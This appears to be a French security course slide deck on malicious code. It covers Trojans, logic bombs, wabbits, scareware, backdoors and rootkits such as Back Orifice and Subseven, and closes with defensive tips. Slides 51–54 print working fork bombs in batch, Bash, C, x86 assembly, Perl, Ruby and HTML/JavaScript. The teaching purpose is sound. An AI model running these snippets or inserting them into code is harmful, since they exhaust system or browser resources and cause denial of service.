  • 44. Codes malveillants Comme son nom à la référence mythologique l'indique, un cheval de Troie ou Trojan Horse est un programme ou un sous-programme camouflé sous le nom ou au sein d'un programme légitime. Par définition, il ne cache pas forcément une fonction de type malware : un jeu caché et appelé via une combinaison de touche secrète dans un logiciel bureautique, est aussi un cheval de Troie. Parfois, seul le nom du programme laisse penser que le programme est inoffensif : Bien que répertorié sous ce nom il ne s'agit pas exactement du fonctionnement d'un cheval de Troie : c'est uniquement sous un faux nom qu'il se cache alors.
  • 45. Codes malveillants Le Cheval de troie est généralement intégré au sein d'un programme de type utilitaire ou application bureautique. Il s'agit alors de sous-programmes embarqués eux même au sein d' un programme légitime. Lors du lancement du programme légitime, ou encore lors d'une action particulière, le sous-programme caché est alors exécuté. Les chevaux de troie sont le plus souvent utilisés pour camoufler des programmes malveillants : backdoors, bombes logiques, keyloggers, spywares ou autres outils permettant de prendre le contrôle du système ou d'obtenir des informations réputées confidentielles.
  • 46. Codes malveillants LES BOMBES LOGIQUES Un danger bien réel pour vos données
  • 47. Codes malveillants Les bombes logiques parfois également appelées « soft bombs » ou bombes logicielles, sont généralement des dispositifs massivement destructeurs de données, programmés pour se déclencher lors d'une ou plusieurs conditions déterminées. Ces conditions sont souvent : un signal, une date, une heure, ou encore une action attendue d'un utilisateur ou d'un programme du système (ouverture d'un menu particulier, clic, séquence de lettres ou de chiffres, lancement d'un logiciel, accès à un fichier particulier ou à une URL sur Internet...). Parfois elles peuvent effectuer d'autres actions comme crypter les données du système d'information ou de la machine qui la contient (crypto bombe).
  • 48. Codes malveillants Certaines bombes logiques peuvent également être déclenchées à distance par un email, ou tout autre protocole réseau (bombe liée à la pile TCP/IP de l'OS qui se déclenchera lorsque le champs data d'un paquet TCP/IP contiendra une information particulière) Les bombes logiques sont parfois utilisées comme telle. Cependant, de nombreux virus, vers et autres malwares embarquent parfois une ou plusieurs bombes logiques dans leur code. Les bombes logiques sont fréquemment utilisées pour soutirer de l'argent à une cible, de la société au particulier, via du chantage : la société doit payer dans les prochaines heures pour ne pas perdre toutes ses données, le particulier pour récupérer ses documents cryptés, etc.
  • 50. Codes malveillants Le wabbit est un malware particulier qui à l'instar des virus a pour principale caractéristique l'autoréplication. La comparaison s'arrête cependant ici car contrairement aux virus il n'infecte ni les programmes, ni les documents, ni le secteur de démarrage. Contrairement aux vers, il ne se propage pas au travers des réseaux. Une fork bomb par exemple (création d'un nombre très important de processus dans le bug de saturer toute la mémoire disponible ainsi que le CPU disponible) est un wabbit
  • 51. Codes malveillants Quelques exemples de fork bomb : Sous Windows dans un fichier batch : %0|%0 Ou encore : :s start %0 goto :s Sous Unix en shell Bash : :(){ :|:& };: :() définit une fonction nommée :. { :|:& } est le corps de la fonction. Dans celui-ci, la fonction s'appelle elle-même (:), puis redirige la sortie à l'aide d'un pipe (|) sur l'entrée de la même fonction : et cache le processus en fond avec &. La fonction, ensuite appelée avec :, s'appelle récursivement à l'infini.
  • 52. Codes malveillants Quelques exemples de fork bomb : En langage C #include <unistd.h> int main(void) { while(1) { /* ici on peut ajouter un malloc pour utiliser plus de ressources */ fork(); } return 0; }
  • 53. Codes malveillants Quelques exemples de fork bomb : En assembleur x86 : entry start start: push 0x2 pop eax int 0x80 jmp start En perl : perl -e "fork while fork" & En Ruby : loop { fork }
  • 54. Codes malveillants Quelques exemples de fork bomb : Tout simplement en HTML : <html> <script type="text/javascript"> function open_target_blank() { window.open(window.location); } window.onload = open_target_blank(); </script> <body> </body> </html>
  • 56. Codes malveillants Un rogue, ou scareware est en quelque sorte une exploitation automatique du social engineering : En se promenant sur un site internet, un utilisateur recevra une alerte lui indiquant que sa machine est infectée par un logiciel malveillant. On lui indique ensuite généralement un logiciel qu'il peut installer pour nettoyer son ordinateur. Souvent, on demande à l'utilisateur de payer une licence de quelques dizaines de dollars : non seulement l'utilisateur s'est infecté lui même mais en plus il a payé pour le faire.
  • 57. Codes malveillants LES BACKDOORS ET ROOTKITS Les portes dérobées
  • 58. Codes malveillants On appelle backdoor, une fonctionnalité cachée, généralement par le son concepteur, dans un programme ou un sous-programme, permettant de donner un accès privilégié, généralement administrateur, au software concerné. Une backdoor peut également être introduite par un tiers, via la modification d'un logiciel. Généralement, les backdoors permettent de contourner les mesures d'authentifications, souvent y compris des mesures rajoutées après sa mise en place. De nombreuses backdoors ont été introduites par le concepteur du software la contenant, notamment afin de permettre la maintenance du software en cas de la perte des accès par le client, ou bien afin de pouvoir désactiver ce dernier en cas de contentieux.
  • 59. Codes malveillants Lorsque la backdoor permet à la fois de dissimuler une activité et de pérenniser un accès administrateur on la désigne généralement sous le terme de rootkit. Certaines backdoors vont jusqu'à s'attaquer au noyau par l'intermédiaire de modules résidents tel que lkm (linux kernel module) par exemple, leur permettant d'intercepter tous les appels y compris de commandes « saines » et non modifiées. Même avec un nettoyage approfondi, il est difficile d'être certain à 100 % que le système est à nouveau « sain », et il reste préférable de le réinstaller complètement (sans oublier le bootloader)
  • 60. Codes malveillants Plusieurs backdoors Windows ont connu leur heure de gloire, y compris auprès des administrateurs, car certaines offraient des possibilité qui n'existaient pas dans les outils d'administration standard. Back Orifice, crée en août 1998 par la team « Cult of the Dead Cow (cDc ou en Français le Culte de la vache morte) permet notamment d'accéder à l'ensemble des informations système, d'afficher le contenu d'un fichier à distance, de lancer un serveur http intégré, ou encore chose impossible d'origine sous Windows 95/98 de lister l'ensemble des processus en cours d'exécution. Il permet également d'accéder à la base de registre, d'afficher une boite du dialogue ou de voir l’ensemble des mots de passe stockés sur la machine.
  • 61. Codes malveillants Subseven quant à lui, développé également à la fin des année 90, permet dans une interface graphique très simple coté « client », et après exécution du binaire par l'hôte, souvent au travers d'une méthode de type cheval de troie, permet de : Scanner des ips, être notifié automatiquement de la connexion via ICQ ou IRC, uploader et exécuter des fichiers, les effacer, déclencher l'impression sur l'hôte, afficher une image, ouvrir ou fermer le lecteur CD, activer la webcam et regarde ce qui se passe, inverser l'écran, voir le bureau et en prendre le contrôle, enregistrer tous les mots de passe utilisés, intéragir / dialoguer avec l'utilisateur de l'hôte, etc.
  • 64. Codes Malveillants - Maintenez vos applications et OS à jour, faites de la veille. - Utilisez un firewall et un antivirus - Évitez l'ouverture de pièces jointes suspectes ou inutiles - Évitez d'ouvrir un partage sans mot de passe solide - Utilisez 2 antivirus différents : pour les serveurs et les clients - Ne cliquez pas sur les liens que vous recevez par email - Faites attention aux Hoax concernant les virus...